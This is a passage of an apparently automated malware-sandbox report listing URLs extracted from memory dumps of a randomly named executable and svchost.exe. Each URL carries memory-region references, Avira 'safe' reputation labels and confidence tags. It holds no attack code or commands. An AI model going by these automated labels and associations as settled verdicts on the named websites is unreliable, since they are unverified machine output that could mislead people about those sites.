                                                                                                                                                                                                                                      http://www.myropcb.com/wp-content/themes/thematic/library/scripts/supersubs.jsiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://gpthink.com/product/204.htmliJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429302770.0000000008B00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435832282.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.435550642.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434048283.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431188888.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.429996077.0000000005580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.431935732.0000000005050000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://www.com-sit.com/wp-content/uploads/2019/01/SUB_Header_02_AUF-EINEN-BLICK.jpgiJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.11.0iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://www.stajum.com/2iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://www.valselit.com/174-appartement-a-vendre-grenoble-30514iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://www.pwd.org/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296716341.0000000008C00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297881797.00000000031D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438940303.0000000003090000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://www.pcgrate.com/wp-content/plugins/woo-rfq-for-woocommerce/gpls_assets/js/gpls_woo_rfq.js?veriJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://net3.necs.com/pohlfood/site/search?selectview=byclass&amp;queryCol=&amp;terms=pizzaiJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://www.com-sit.com/wp-content/uploads/2019/01/BOX_Statement_02_BOOK-50x42.jpgiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            http://www.pwd.org/MiJzpyjAehB.exe, 00000000.00000002.603177646.0000000007565000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                                                            unknown
                                                                                                                                                                                                                                            https://net3.necs.com/pohlfood/site/search?selectview=choose&amp;queryCol=class&amp;terms=MediterraniJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://pohlfood.com/comments/feed/iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.indonesiamedia.com/contact-us/svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://www.aevga.com/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.278369986.0000000008700000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373377308.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://www.com-sit.com/en/iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://www.myropcb.com/services-capabilities/pcb-restoration/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=LiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347142690.00000000075CA000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.603177646.00000000075B7000.00000004.00000020.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  http://gmpg.org/xfn/11iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.496913823.000000000332A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    http://www.pwd.org/_iJzpyjAehB.exe, 00000000.00000003.347514573.0000000007564000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                    https://www.com-sit.com/wp-content/uploads/fonts/roboto-v30-latin-regular.eot?#iefixiJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      http://www.myropcb.com/services-capabilities/stencil/iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.300368242.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.439075116.0000000008E00000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.302597912.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.311024379.0000000003180000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000002.596543130.0000000003910000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.367774012.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.379844258.0000000003320000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.347627951.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.467548512.00000000036B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.440284917.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.316183261.0000000003480000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.460052279.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400867170.0000000002BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      • Avira URL Cloud: safe
